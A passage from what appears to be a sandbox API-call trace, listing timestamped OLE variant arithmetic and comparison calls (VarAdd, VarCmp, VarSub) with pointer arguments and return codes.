pvarResult=0x6b7ca98) returned 0x0 [0042.136] VarCmp (pvarLeft=0x6b7ea90, pvarRight=0x6b7ca18, lcid=0x0, dwFlags=0x30001) returned 0x0 [0042.136] VarAdd (in: pvarLeft=0x6b7c928, pvarRight=0x6b7c958, pvarResult=0x6b7c940 | out: pvarResult=0x6b7c940) returned 0x0 [0042.136] VarCmp (pvarLeft=0x6b7eb38, pvarRight=0x6b7c9a8, lcid=0x0, dwFlags=0x30001) returned 0x1 [0042.136] VarSub (in: pvarLeft=0x6b7eb20, pvarRight=0x6b7eb80, pvarResult=0x6b7eb68 | out: pvarResult=0x6b7eb68) returned 0x0 [0042.136] VarCmp (pvarLeft=0x6b7eaf0, pvarRight=0x6b7eaa0, lcid=0x0, dwFlags=0x30001) returned 0x2 [0042.136] VarCmp (pvarLeft=0x6b7eaf0, pvarRight=0x6b7eaa0, lcid=0x0, dwFlags=0x30001) returned 0x2 [0042.137] VarAdd (in: pvarLeft=0x6b7e9b0, pvarRight=0x6b7e9e0, pvarResult=0x6b7e9c8 | out: pvarResult=0x6b7e9c8) returned 0x0 [0042.137] VarAdd (in: pvarLeft=0x6b7eb80, pvarRight=0x6b7eb08, pvarResult=0x6b7eb68 | out: pvarResult=0x6b7eb68) returned 0x0 [0042.137] VarAdd (in: pvarLeft=0x6b7ec98, pvarRight=0x6b7eb80, pvarResult=0x6b7eb68 | out: pvarResult=0x6b7eb68) returned 0x0 [0042.137] VarCmp (pvarLeft=0x6b7ec98, pvarRight=0x6b7ea70, lcid=0x0, dwFlags=0x30001) returned 0x0 [0042.137] VarAdd (in: pvarLeft=0x6b7e990, pvarRight=0x6b7e9c0, pvarResult=0x6b7e9a8 | out: pvarResult=0x6b7e9a8) returned 0x0 [0042.137] VarCmp (pvarLeft=0x6b7e9b0, pvarRight=0x6b7e978, lcid=0x0, dwFlags=0x30001) returned 0x0 [0042.137] VarAdd (in: pvarLeft=0x6b7e888, pvarRight=0x6b7e8b8, pvarResult=0x6b7e8a0 | out: pvarResult=0x6b7e8a0) returned 0x0 [0042.137] VarCmp (pvarLeft=0x6b7ea58, pvarRight=0x6b7e908, lcid=0x0, dwFlags=0x30001) returned 0x0 [0042.138] VarAdd (in: pvarLeft=0x6b7e9b0, pvarRight=0x6b7e960, pvarResult=0x6b7e938 | out: pvarResult=0x6b7e938) returned 0x0 [0042.138] VarCmp (pvarLeft=0x6b7e9b0, pvarRight=0x6b7e8b8, lcid=0x0, dwFlags=0x30001) returned 0x0 [0042.138] VarAdd (in: pvarLeft=0x6b7e7c8, pvarRight=0x6b7e7f8, pvarResult=0x6b7e7e0 | out: pvarResult=0x6b7e7e0) returned 0x0 [0042.138] VarCmp (pvarLeft=0x6b7ea58, pvarRight=0x6b7e848, lcid=0x0, dwFlags=0x30001) returned 0x0 [0042.138] VarAdd (in: pvarLeft=0x6b7e9b0, pvarRight=0x6b7e8a0, pvarResult=0x6b7e878 | out: pvarResult=0x6b7e878) returned 0x0 [0042.138] VarCmp (pvarLeft=0x6b7e9b0, pvarRight=0x6b7e7f8, lcid=0x0, dwFlags=0x30001) returned 0x0 [0042.138] VarAdd (in: pvarLeft=0x6b7e708, pvarRight=0x6b7e738, pvarResult=0x6b7e720 | out: pvarResult=0x6b7e720) returned 0x0 [0042.138] VarCmp (pvarLeft=0x6b7ea58, pvarRight=0x6b7e788, lcid=0x0, dwFlags=0x30001) returned 0x0 [0042.138] VarAdd (in: pvarLeft=0x6b7e9b0, pvarRight=0x6b7e7e0, pvarResult=0x6b7e7b8 | out: pvarResult=0x6b7e7b8) returned 0x0 [0042.138] VarCmp (pvarLeft=0x6b7e9b0, pvarRight=0x6b7e738, lcid=0x0, dwFlags=0x30001) returned 0x0 [0042.139] VarAdd (in: pvarLeft=0x6b7e648, pvarRight=0x6b7e678, pvarResult=0x6b7e660 | out: pvarResult=0x6b7e660) returned 0x0 [0042.139] VarCmp (pvarLeft=0x6b7ea58, pvarRight=0x6b7e6c8, lcid=0x0, dwFlags=0x30001) returned 0x2 [0042.139] VarAdd (in: pvarLeft=0x6b7e9b0, pvarRight=0x6b7e720, pvarResult=0x6b7e6f8 | out: pvarResult=0x6b7e6f8) returned 0x0 [0042.139] VarCmp (pvarLeft=0x6b7e9b0, pvarRight=0x6b7e678, lcid=0x0, dwFlags=0x30001) returned 0x0 [0042.139] VarAdd (in: pvarLeft=0x6b7e588, pvarRight=0x6b7e5b8, pvarResult=0x6b7e5a0 | out: pvarResult=0x6b7e5a0) returned 0x0 [0042.139] VarCmp (pvarLeft=0x6b7ea58, pvarRight=0x6b7e608, lcid=0x0, dwFlags=0x30001) returned 0x0 [0042.139] VarAdd (in: pvarLeft=0x6b7e9b0, pvarRight=0x6b7e660, pvarResult=0x6b7e638 | out: pvarResult=0x6b7e638) returned 0x0 [0042.139] VarCmp (pvarLeft=0x6b7e9b0, pvarRight=0x6b7e5b8, lcid=0x0, dwFlags=0x30001) returned 0x0 [0042.139] VarAdd (in: pvarLeft=0x6b7e4c8, pvarRight=0x6b7e4f8, pvarResult=0x6b7e4e0 | out: pvarResult=0x6b7e4e0) returned 0x0 [0042.140] VarCmp (pvarLeft=0x6b7ea58, pvarRight=0x6b7e548, lcid=0x0, dwFlags=0x30001) returned 0x0 [0042.140] VarAdd (in: pvarLeft=0x6b7e9b0, pvarRight=0x6b7e5a0, pvarResult=0x6b7e578 | out: pvarResult=0x6b7e578) returned 0x0 [0042.140] VarCmp (pvarLeft=0x6b7e9b0, pvarRight=0x6b7e4f8, lcid=0x0, dwFlags=0x30001) returned 0x0 [0042.140] VarAdd (in: pvarLeft=0x6b7e408, pvarRight=0x6b7e438, pvarResult=0x6b7e420 | out: pvarResult=0x6b7e420) returned 0x0 [0042.140] VarCmp (pvarLeft=0x6b7ea58, pvarRight=0x6b7e488, lcid=0x0, dwFlags=0x30001) returned 0x2 [0042.140] VarAdd (in: pvarLeft=0x6b7e9b0, pvarRight=0x6b7e4e0, pvarResult=0x6b7e4b8 | out: pvarResult=0x6b7e4b8) returned 0x0 [0042.140] VarCmp (pvarLeft=0x6b7e9b0, pvarRight=0x6b7e438, lcid=0x0, dwFlags=0x30001) returned 0x0 [0042.140] VarAdd (in: pvarLeft=0x6b7e348, pvarRight=0x6b7e378, pvarResult=0x6b7e360 | out: pvarResult=0x6b7e360) returned 0x0 [0042.140] VarCmp (pvarLeft=0x6b7ea58, pvarRight=0x6b7e3c8, lcid=0x0, dwFlags=0x30001) returned 0x0 [0042.140] VarAdd (in: pvarLeft=0x6b7e9b0, pvarRight=0x6b7e420, pvarResult=0x6b7e3f8 | out: pvarResult=0x6b7e3f8) returned 0x0 [0042.140] VarCmp (pvarLeft=0x6b7e9b0, pvarRight=0x6b7e378, lcid=0x0, dwFlags=0x30001) returned 0x0 [0042.141] VarAdd (in: pvarLeft=0x6b7e288, pvarRight=0x6b7e2b8, pvarResult=0x6b7e2a0 | out: pvarResult=0x6b7e2a0) returned 0x0 [0042.141] VarCmp (pvarLeft=0x6b7ea58, pvarRight=0x6b7e308, lcid=0x0, dwFlags=0x30001) returned 0x0 [0042.141] VarAdd (in: pvarLeft=0x6b7e9b0, pvarRight=0x6b7e360, pvarResult=0x6b7e338 | out: pvarResult=0x6b7e338) returned 0x0 [0042.141] VarCmp (pvarLeft=0x6b7e9b0, pvarRight=0x6b7e2b8, lcid=0x0, dwFlags=0x30001) returned 0x0 [0042.141] VarAdd (in: pvarLeft=0x6b7e1c8, pvarRight=0x6b7e1f8, pvarResult=0x6b7e1e0 | out: pvarResult=0x6b7e1e0) returned 0x0 [0042.141] VarCmp (pvarLeft=0x6b7ea58, pvarRight=0x6b7e248, lcid=0x0, dwFlags=0x30001) returned 0x0 [0042.141] VarAdd (in: pvarLeft=0x6b7e9b0, pvarRight=0x6b7e2a0, pvarResult=0x6b7e278 | out: pvarResult=0x6b7e278) returned 0x0 [0042.141] VarCmp (pvarLeft=0x6b7e9b0, pvarRight=0x6b7e1f8, lcid=0x0, dwFlags=0x30001) returned 0x0 [0042.141] VarAdd (in: pvarLeft=0x6b7e108, pvarRight=0x6b7e138, pvarResult=0x6b7e120 | out: pvarResult=0x6b7e120) returned 0x0 [0042.142] VarCmp (pvarLeft=0x6b7ea58, pvarRight=0x6b7e188, lcid=0x0, dwFlags=0x30001) returned 0x2 [0042.142] VarAdd (in: pvarLeft=0x6b7e9b0, pvarRight=0x6b7e1e0, pvarResult=0x6b7e1b8 | out: pvarResult=0x6b7e1b8) returned 0x0 [0042.142] VarCmp (pvarLeft=0x6b7e9b0, pvarRight=0x6b7e138, lcid=0x0, dwFlags=0x30001) returned 0x0 [0042.142] VarAdd (in: pvarLeft=0x6b7e048, pvarRight=0x6b7e078, pvarResult=0x6b7e060 | out: pvarResult=0x6b7e060) returned 0x0 [0042.142] VarCmp (pvarLeft=0x6b7ea58, pvarRight=0x6b7e0c8, lcid=0x0, dwFlags=0x30001) returned 0x0 [0042.142] VarAdd (in: pvarLeft=0x6b7e9b0, pvarRight=0x6b7e120, pvarResult=0x6b7e0f8 | out: pvarResult=0x6b7e0f8) returned 0x0 [0042.142] VarCmp (pvarLeft=0x6b7e9b0, pvarRight=0x6b7e078, lcid=0x0, dwFlags=0x30001) returned 0x0 [0042.142] VarAdd (in: pvarLeft=0x6b7df88, pvarRight=0x6b7dfb8, pvarResult=0x6b7dfa0 | out: pvarResult=0x6b7dfa0) returned 0x0 [0042.142] VarCmp (pvarLeft=0x6b7ea58, pvarRight=0x6b7e008, lcid=0x0, dwFlags=0x30001) returned 0x0 [0042.142] VarAdd (in: pvarLeft=0x6b7e9b0, pvarRight=0x6b7e060, pvarResult=0x6b7e038 | out: pvarResult=0x6b7e038) returned 0x0 [0042.142] VarCmp (pvarLeft=0x6b7e9b0, pvarRight=0x6b7dfb8, lcid=0x0, dwFlags=0x30001) returned 0x0 [0042.143] VarAdd (in: pvarLeft=0x6b7dec8, pvarRight=0x6b7def8, pvarResult=0x6b7dee0 | out: pvarResult=0x6b7dee0) returned 0x0 [0042.143] VarCmp (pvarLeft=0x6b7ea58, pvarRight=0x6b7df48, lcid=0x0, dwFlags=0x30001) returned 0x0 [0042.143] VarAdd (in: pvarLeft=0x6b7e9b0, pvarRight=0x6b7dfa0, pvarResult=0x6b7df78 | out: pvarResult=0x6b7df78) returned 0x0 [0042.143] VarCmp (pvarLeft=0x6b7e9b0, pvarRight=0x6b7def8, lcid=0x0, dwFlags=0x30001) returned 0x0 [0042.143] VarAdd (in: pvarLeft=0x6b7de08, pvarRight=0x6b7de38, pvarResult=0x6b7de20 | out: pvarResult=0x6b7de20) returned 0x0 [0042.143] VarCmp (pvarLeft=0x6b7ea58, pvarRight=0x6b7de88, lcid=0x0, dwFlags=0x30001) returned 0x2 [0042.143] VarAdd (in: pvarLeft=0x6b7e9b0, pvarRight=0x6b7dee0, pvarResult=0x6b7deb8 | out: pvarResult=0x6b7deb8) returned 0x0 [0042.143] VarCmp (pvarLeft=0x6b7e9b0, pvarRight=0x6b7de38, lcid=0x0, dwFlags=0x30001) returned 0x0 [0042.143] VarAdd (in: pvarLeft=0x6b7dd48, pvarRight=0x6b7dd78, pvarResult=0x6b7dd60 | out: pvarResult=0x6b7dd60) returned 0x0 [0042.144] VarCmp (pvarLeft=0x6b7ea58, pvarRight=0x6b7ddc8, lcid=0x0, dwFlags=0x30001) returned 0x0 [0042.144] VarAdd (in: pvarLeft=0x6b7e9b0, pvarRight=0x6b7de20, pvarResult=0x6b7ddf8 | out: pvarResult=0x6b7ddf8) returned 0x0 [0042.144] VarCmp (pvarLeft=0x6b7e9b0, pvarRight=0x6b7dd78, lcid=0x0, dwFlags=0x30001) returned 0x0 [0042.144] VarAdd (in: pvarLeft=0x6b7dc88, pvarRight=0x6b7dcb8, pvarResult=0x6b7dca0 | out: pvarResult=0x6b7dca0) returned 0x0 [0042.144] VarCmp (pvarLeft=0x6b7ea58, pvarRight=0x6b7dd08, lcid=0x0, dwFlags=0x30001) returned 0x0 [0042.144] VarAdd (in: pvarLeft=0x6b7e9b0, pvarRight=0x6b7dd60, pvarResult=0x6b7dd38 | out: pvarResult=0x6b7dd38) returned 0x0 [0042.144] VarCmp (pvarLeft=0x6b7e9b0, pvarRight=0x6b7dcb8, lcid=0x0, dwFlags=0x30001) returned 0x0 [0042.144] VarAdd (in: pvarLeft=0x6b7dbc8, pvarRight=0x6b7dbf8, pvarResult=0x6b7dbe0 | out: pvarResult=0x6b7dbe0) returned 0x0 [0042.144] VarCmp (pvarLeft=0x6b7ea58, pvarRight=0x6b7dc48, lcid=0x0, dwFlags=0x30001) returned 0x0 [0042.144] VarAdd (in: pvarLeft=0x6b7e9b0, pvarRight=0x6b7dca0, pvarResult=0x6b7dc78 | out: pvarResult=0x6b7dc78) returned 0x0 [0042.144] VarCmp (pvarLeft=0x6b7e9b0, pvarRight=0x6b7dbf8, lcid=0x0, dwFlags=0x30001) returned 0x0 [0042.145] VarAdd (in: pvarLeft=0x6b7db08, pvarRight=0x6b7db38, pvarResult=0x6b7db20 | out: pvarResult=0x6b7db20) returned 0x0 [0042.145] VarCmp (pvarLeft=0x6b7ea58, pvarRight=0x6b7db88, lcid=0x0, dwFlags=0x30001) returned 0x2 [0042.145] VarAdd (in: pvarLeft=0x6b7e9b0, pvarRight=0x6b7dbe0, pvarResult=0x6b7dbb8 | out: pvarResult=0x6b7dbb8) returned 0x0 [0042.145] VarCmp (pvarLeft=0x6b7e9b0, pvarRight=0x6b7db38, lcid=0x0, dwFlags=0x30001) returned 0x0 [0042.145] VarAdd (in: pvarLeft=0x6b7da48, pvarRight=0x6b7da78, pvarResult=0x6b7da60 | out: pvarResult=0x6b7da60) returned 0x0 [0042.145] VarCmp (pvarLeft=0x6b7ea58, pvarRight=0x6b7dac8, lcid=0x0, dwFlags=0x30001) returned 0x0 [0042.145] VarAdd (in: pvarLeft=0x6b7e9b0, pvarRight=0x6b7db20, pvarResult=0x6b7daf8 | out: pvarResult=0x6b7daf8) returned 0x0 [0042.145] VarCmp (pvarLeft=0x6b7e9b0, pvarRight=0x6b7da78, lcid=0x0, dwFlags=0x30001) returned 0x0 [0042.145] VarAdd (in: pvarLeft=0x6b7d988, pvarRight=0x6b7d9b8, pvarResult=0x6b7d9a0 | out: pvarResult=0x6b7d9a0) returned 0x0 [0042.146] VarCmp (pvarLeft=0x6b7ea58, pvarRight=0x6b7da08, lcid=0x0, dwFlags=0x30001) returned 0x0 [0042.146] VarAdd (in: pvarLeft=0x6b7e9b0, pvarRight=0x6b7da60, pvarResult=0x6b7da38 | out: pvarResult=0x6b7da38) returned 0x0 [0042.146] VarCmp (pvarLeft=0x6b7e9b0, pvarRight=0x6b7d9b8, lcid=0x0, dwFlags=0x30001) returned 0x0 [0042.146] VarAdd (in: pvarLeft=0x6b7d8c8, pvarRight=0x6b7d8f8, pvarResult=0x6b7d8e0 | out: pvarResult=0x6b7d8e0) returned 0x0 [0042.146] VarCmp (pvarLeft=0x6b7ea58, pvarRight=0x6b7d948, lcid=0x0, dwFlags=0x30001) returned 0x0 [0042.146] VarAdd (in: pvarLeft=0x6b7e9b0, pvarRight=0x6b7d9a0, pvarResult=0x6b7d978 | out: pvarResult=0x6b7d978) returned 0x0 [0042.146] VarCmp (pvarLeft=0x6b7e9b0, pvarRight=0x6b7d8f8, lcid=0x0, dwFlags=0x30001) returned 0x0 [0042.147] VarAdd (in: pvarLeft=0x6b7d808, pvarRight=0x6b7d838, pvarResult=0x6b7d820 | out: pvarResult=0x6b7d820) returned 0x0 [0042.147] VarCmp (pvarLeft=0x6b7ea58, pvarRight=0x6b7d888, lcid=0x0, dwFlags=0x30001) returned 0x2 [0042.147] VarAdd (in: pvarLeft=0x6b7e9b0, pvarRight=0x6b7d8e0, pvarResult=0x6b7d8b8 | out: pvarResult=0x6b7d8b8) returned 0x0 [0042.147] VarCmp (pvarLeft=0x6b7e9b0, pvarRight=0x6b7d838, lcid=0x0, dwFlags=0x30001) returned 0x0 [0042.147] VarAdd (in: pvarLeft=0x6b7d748, pvarRight=0x6b7d778, pvarResult=0x6b7d760 | out: pvarResult=0x6b7d760) returned 0x0 [0042.147] VarCmp (pvarLeft=0x6b7ea58, pvarRight=0x6b7d7c8, lcid=0x0, dwFlags=0x30001) returned 0x0 [0042.147] VarAdd (in: pvarLeft=0x6b7e9b0, pvarRight=0x6b7d820, pvarResult=0x6b7d7f8 | out: pvarResult=0x6b7d7f8) returned 0x0 [0042.147] VarCmp (pvarLeft=0x6b7e9b0, pvarRight=0x6b7d778, lcid=0x0, dwFlags=0x30001) returned 0x0 [0042.147] VarAdd (in: pvarLeft=0x6b7d688, pvarRight=0x6b7d6b8, pvarResult=0x6b7d6a0 | out: pvarResult=0x6b7d6a0) returned 0x0 [0042.147] VarCmp (pvarLeft=0x6b7ea58, pvarRight=0x6b7d708, lcid=0x0, dwFlags=0x30001) returned 0x0 [0042.147] VarAdd (in: pvarLeft=0x6b7e9b0, pvarRight=0x6b7d760, pvarResult=0x6b7d738 | out: pvarResult=0x6b7d738) returned 0x0 [0042.148] VarCmp (pvarLeft=0x6b7e9b0, pvarRight=0x6b7d6b8, lcid=0x0, dwFlags=0x30001) returned 0x0 [0042.148] VarAdd (in: pvarLeft=0x6b7d5c8, pvarRight=0x6b7d5f8, pvarResult=0x6b7d5e0 | out: pvarResult=0x6b7d5e0) returned 0x0 [0042.148] VarCmp (pvarLeft=0x6b7ea58, pvarRight=0x6b7d648, lcid=0x0, dwFlags=0x30001) returned 0x2 [0042.148] VarAdd (in: pvarLeft=0x6b7e9b0, pvarRight=0x6b7d6a0, pvarResult=0x6b7d678 | out: pvarResult=0x6b7d678) returned 0x0 [0042.148] VarCmp (pvarLeft=0x6b7e9b0, pvarRight=0x6b7d5f8, lcid=0x0, dwFlags=0x30001) returned 0x0 [0042.148] VarAdd (in: pvarLeft=0x6b7d508, pvarRight=0x6b7d538, pvarResult=0x6b7d520 | out: pvarResult=0x6b7d520) returned 0x0 [0042.148] VarCmp (pvarLeft=0x6b7ea58, pvarRight=0x6b7d588, lcid=0x0, dwFlags=0x30001) returned 0x0 [0042.148] VarAdd (in: pvarLeft=0x6b7e9b0, pvarRight=0x6b7d5e0, pvarResult=0x6b7d5b8 | out: pvarResult=0x6b7d5b8) returned 0x0 [0042.148] VarCmp (pvarLeft=0x6b7e9b0, pvarRight=0x6b7d538, lcid=0x0, dwFlags=0x30001) returned 0x0 [0042.149] VarAdd (in: pvarLeft=0x6b7d448, pvarRight=0x6b7d478, pvarResult=0x6b7d460 | out: pvarResult=0x6b7d460) returned 0x0 [0042.149] VarCmp (pvarLeft=0x6b7ea58, pvarRight=0x6b7d4c8, lcid=0x0, dwFlags=0x30001) returned 0x2 [0042.149] VarAdd (in: pvarLeft=0x6b7e9b0, pvarRight=0x6b7d520, pvarResult=0x6b7d4f8 | out: pvarResult=0x6b7d4f8) returned 0x0 [0042.149] VarCmp (pvarLeft=0x6b7e9b0, pvarRight=0x6b7d478, lcid=0x0, dwFlags=0x30001) returned 0x0 [0042.149] VarAdd (in: pvarLeft=0x6b7d388, pvarRight=0x6b7d3b8, pvarResult=0x6b7d3a0 | out: pvarResult=0x6b7d3a0) returned 0x0 [0042.149] VarCmp (pvarLeft=0x6b7ea58, pvarRight=0x6b7d408, lcid=0x0, dwFlags=0x30001) returned 0x1 [0042.149] VarSub (in: pvarLeft=0x6b7ea40, pvarRight=0x6b7eaa0, pvarResult=0x6b7ea88 | out: pvarResult=0x6b7ea88) returned 0x0 [0042.149] VarCmp (pvarLeft=0x6b7ea10, pvarRight=0x6b7e9c0, lcid=0x0, dwFlags=0x30001) returned 0x2 [0042.149] VarCmp (pvarLeft=0x6b7ea10, pvarRight=0x6b7e9c0, lcid=0x0, dwFlags=0x30001) returned 0x2 [0042.149] VarAdd (in: pvarLeft=0x6b7e8d0, pvarRight=0x6b7e900, pvarResult=0x6b7e8e8 | out: pvarResult=0x6b7e8e8) returned 0x0 [0042.149] VarAdd (in: pvarLeft=0x6b7eaa0, pvarRight=0x6b7ea28, pvarResult=0x6b7ea88 | out: pvarResult=0x6b7ea88) returned 0x0 [0042.149] VarAdd (in: pvarLeft=0x6b7ec98, pvarRight=0x6b7eaa0, pvarResult=0x6b7ea88 | out: pvarResult=0x6b7ea88) returned 0x0 [0042.150] VarCmp (pvarLeft=0x6b7ec98, pvarRight=0x6b7e990, lcid=0x0, dwFlags=0x30001) returned 0x0 [0042.150] VarAdd (in: pvarLeft=0x6b7e8b0, pvarRight=0x6b7e8e0, pvarResult=0x6b7e8c8 | out: pvarResult=0x6b7e8c8) returned 0x0 [0042.150] VarCmp (pvarLeft=0x6b7e8d0, pvarRight=0x6b7e898, lcid=0x0, dwFlags=0x30001) returned 0x0 [0042.150] VarAdd (in: pvarLeft=0x6b7e7a8, pvarRight=0x6b7e7d8, pvarResult=0x6b7e7c0 | out: pvarResult=0x6b7e7c0) returned 0x0 [0042.150] VarCmp (pvarLeft=0x6b7e978, pvarRight=0x6b7e828, lcid=0x0, dwFlags=0x30001) returned 0x0 [0042.150] VarAdd (in: pvarLeft=0x6b7e8d0, pvarRight=0x6b7e880, pvarResult=0x6b7e858 | out: pvarResult=0x6b7e858) returned 0x0 [0042.150] VarCmp (pvarLeft=0x6b7e8d0, pvarRight=0x6b7e7d8, lcid=0x0, dwFlags=0x30001) returned 0x0 [0042.150] VarAdd (in: pvarLeft=0x6b7e6e8, pvarRight=0x6b7e718, pvarResult=0x6b7e700 | out: pvarResult=0x6b7e700) returned 0x0 [0042.150] VarCmp (pvarLeft=0x6b7e978, pvarRight=0x6b7e768, lcid=0x0, dwFlags=0x30001) returned 0x0 [0042.150] VarAdd (in: pvarLeft=0x6b7e8d0, pvarRight=0x6b7e7c0, pvarResult=0x6b7e798 | out: pvarResult=0x6b7e798) returned 0x0 [0042.151] VarCmp (pvarLeft=0x6b7e8d0, pvarRight=0x6b7e718, lcid=0x0, dwFlags=0x30001) returned 0x0 [0042.151] VarAdd (in: pvarLeft=0x6b7e628, pvarRight=0x6b7e658, pvarResult=0x6b7e640 | out: pvarResult=0x6b7e640) returned 0x0 [0042.151] VarCmp (pvarLeft=0x6b7e978, pvarRight=0x6b7e6a8, lcid=0x0, dwFlags=0x30001) returned 0x0 [0042.151] VarAdd (in: pvarLeft=0x6b7e8d0, pvarRight=0x6b7e700, pvarResult=0x6b7e6d8 | out: pvarResult=0x6b7e6d8) returned 0x0 [0042.151] VarCmp (pvarLeft=0x6b7e8d0, pvarRight=0x6b7e658, lcid=0x0, dwFlags=0x30001) returned 0x0 [0042.151] VarAdd (in: pvarLeft=0x6b7e568, pvarRight=0x6b7e598, pvarResult=0x6b7e580 | out: pvarResult=0x6b7e580) returned 0x0 [0042.151] VarCmp (pvarLeft=0x6b7e978, pvarRight=0x6b7e5e8, lcid=0x0, dwFlags=0x30001) returned 0x2 [0042.151] VarAdd (in: pvarLeft=0x6b7e8d0, pvarRight=0x6b7e640, pvarResult=0x6b7e618 | out: pvarResult=0x6b7e618) returned 0x0 [0042.151] VarCmp (pvarLeft=0x6b7e8d0, pvarRight=0x6b7e598, lcid=0x0, dwFlags=0x30001) returned 0x0 [0042.152] VarAdd (in: pvarLeft=0x6b7e4a8, pvarRight=0x6b7e4d8, pvarResult=0x6b7e4c0 | out: pvarResult=0x6b7e4c0) returned 0x0 [0042.152] VarCmp (pvarLeft=0x6b7e978, pvarRight=0x6b7e528, lcid=0x0, dwFlags=0x30001) returned 0x2 [0042.152] VarAdd (in: pvarLeft=0x6b7e8d0, pvarRight=0x6b7e580, pvarResult=0x6b7e558 | out: pvarResult=0x6b7e558) returned 0x0 [0042.152] VarCmp (pvarLeft=0x6b7e8d0, pvarRight=0x6b7e4d8, lcid=0x0, dwFlags=0x30001) returned 0x0 [0042.152] VarAdd (in: pvarLeft=0x6b7e3e8, pvarRight=0x6b7e418, pvarResult=0x6b7e400 | out: pvarResult=0x6b7e400) returned 0x0 [0042.152] VarCmp (pvarLeft=0x6b7e978, pvarRight=0x6b7e468, lcid=0x0, dwFlags=0x30001) returned 0x0 [0042.152] VarAdd (in: pvarLeft=0x6b7e8d0, pvarRight=0x6b7e4c0, pvarResult=0x6b7e498 | out: pvarResult=0x6b7e498) returned 0x0 [0042.152] VarCmp (pvarLeft=0x6b7e8d0, pvarRight=0x6b7e418, lcid=0x0, dwFlags=0x30001) returned 0x0 [0042.153] VarAdd (in: pvarLeft=0x6b7e328, pvarRight=0x6b7e358, pvarResult=0x6b7e340 | out: pvarResult=0x6b7e340) returned 0x0 [0042.153] VarCmp (pvarLeft=0x6b7e978, pvarRight=0x6b7e3a8, lcid=0x0, dwFlags=0x30001) returned 0x2 [0042.153] VarAdd (in: pvarLeft=0x6b7e8d0, pvarRight=0x6b7e400, pvarResult=0x6b7e3d8 | out: pvarResult=0x6b7e3d8) returned 0x0 [0042.153] VarCmp (pvarLeft=0x6b7e8d0, pvarRight=0x6b7e358, lcid=0x0, dwFlags=0x30001) returned 0x0 [0042.153] VarAdd (in: pvarLeft=0x6b7e268, pvarRight=0x6b7e298, pvarResult=0x6b7e280 | out: pvarResult=0x6b7e280) returned 0x0 [0042.153] VarCmp (pvarLeft=0x6b7e978, pvarRight=0x6b7e2e8, lcid=0x0, dwFlags=0x30001) returned 0x0 [0042.153] VarAdd (in: pvarLeft=0x6b7e8d0, pvarRight=0x6b7e340, pvarResult=0x6b7e318 | out: pvarResult=0x6b7e318) returned 0x0 [0042.153] VarCmp (pvarLeft=0x6b7e8d0, pvarRight=0x6b7e298, lcid=0x0, dwFlags=0x30001) returned 0x0 [0042.153] VarAdd (in: pvarLeft=0x6b7e1a8, pvarRight=0x6b7e1d8, pvarResult=0x6b7e1c0 | out: pvarResult=0x6b7e1c0) returned 0x0 [0042.153] VarCmp (pvarLeft=0x6b7e978, pvarRight=0x6b7e228, lcid=0x0, dwFlags=0x30001) returned 0x0 [0042.153] VarAdd (in: pvarLeft=0x6b7e8d0, pvarRight=0x6b7e280, pvarResult=0x6b7e258 | out: pvarResult=0x6b7e258) returned 0x0 [0042.153] VarCmp (pvarLeft=0x6b7e8d0, pvarRight=0x6b7e1d8, lcid=0x0, dwFlags=0x30001) returned 0x0 [0042.153] VarAdd (in: pvarLeft=0x6b7e0e8, pvarRight=0x6b7e118, pvarResult=0x6b7e100 | out: pvarResult=0x6b7e100) returned 0x0 [0042.153] VarCmp (pvarLeft=0x6b7e978, pvarRight=0x6b7e168, lcid=0x0, dwFlags=0x30001) returned 0x0 [0042.153] VarAdd (in: pvarLeft=0x6b7e8d0, pvarRight=0x6b7e1c0, pvarResult=0x6b7e198 | out: pvarResult=0x6b7e198) returned 0x0 [0042.154] VarCmp (pvarLeft=0x6b7e8d0, pvarRight=0x6b7e118, lcid=0x0, dwFlags=0x30001) returned 0x0 [0042.154] VarAdd (in: pvarLeft=0x6b7e028, pvarRight=0x6b7e058, pvarResult=0x6b7e040 | out: pvarResult=0x6b7e040) returned 0x0 [0042.154] VarCmp (pvarLeft=0x6b7e978, pvarRight=0x6b7e0a8, lcid=0x0, dwFlags=0x30001) returned 0x2 [0042.154] VarAdd (in: pvarLeft=0x6b7e8d0, pvarRight=0x6b7e100, pvarResult=0x6b7e0d8 | out: pvarResult=0x6b7e0d8) returned 0x0 [0042.154] VarCmp (pvarLeft=0x6b7e8d0, pvarRight=0x6b7e058, lcid=0x0, dwFlags=0x30001) returned 0x0 [0042.154] VarAdd (in: pvarLeft=0x6b7df68, pvarRight=0x6b7df98, pvarResult=0x6b7df80 | out: pvarResult=0x6b7df80) returned 0x0 [0042.154] VarCmp (pvarLeft=0x6b7e978, pvarRight=0x6b7dfe8, lcid=0x0, dwFlags=0x30001) returned 0x0 [0042.154] VarAdd (in: pvarLeft=0x6b7e8d0, pvarRight=0x6b7e040, pvarResult=0x6b7e018 | out: pvarResult=0x6b7e018) returned 0x0 [0042.154] VarCmp (pvarLeft=0x6b7e8d0, pvarRight=0x6b7df98, lcid=0x0, dwFlags=0x30001) returned 0x0 [0042.154] VarAdd (in: pvarLeft=0x6b7dea8, pvarRight=0x6b7ded8, pvarResult=0x6b7dec0 | out: pvarResult=0x6b7dec0) returned 0x0 [0042.154] VarCmp (pvarLeft=0x6b7e978, pvarRight=0x6b7df28, lcid=0x0, dwFlags=0x30001) returned 0x0 [0042.154] VarAdd (in: pvarLeft=0x6b7e8d0, pvarRight=0x6b7df80, pvarResult=0x6b7df58 | out: pvarResult=0x6b7df58) returned 0x0 [0042.154] VarCmp (pvarLeft=0x6b7e8d0, pvarRight=0x6b7ded8, lcid=0x0, dwFlags=0x30001) returned 0x0 [0042.154] VarAdd (in: pvarLeft=0x6b7dde8, pvarRight=0x6b7de18, pvarResult=0x6b7de00 | out: pvarResult=0x6b7de00) returned 0x0 [0042.154] VarCmp (pvarLeft=0x6b7e978, pvarRight=0x6b7de68, lcid=0x0, dwFlags=0x30001) returned 0x0 [0042.154] VarAdd (in: pvarLeft=0x6b7e8d0, pvarRight=0x6b7dec0, pvarResult=0x6b7de98 | out: pvarResult=0x6b7de98) returned 0x0 [0042.154] VarCmp (pvarLeft=0x6b7e8d0, pvarRight=0x6b7de18, lcid=0x0, dwFlags=0x30001) returned 0x0 [0042.155] VarAdd (in: pvarLeft=0x6b7dd28, pvarRight=0x6b7dd58, pvarResult=0x6b7dd40 | out: pvarResult=0x6b7dd40) returned 0x0 [0042.155] VarCmp (pvarLeft=0x6b7e978, pvarRight=0x6b7dda8, lcid=0x0, dwFlags=0x30001) returned 0x2 [0042.155] VarAdd (in: pvarLeft=0x6b7e8d0, pvarRight=0x6b7de00, pvarResult=0x6b7ddd8 | out: pvarResult=0x6b7ddd8) returned 0x0 [0042.155] VarCmp 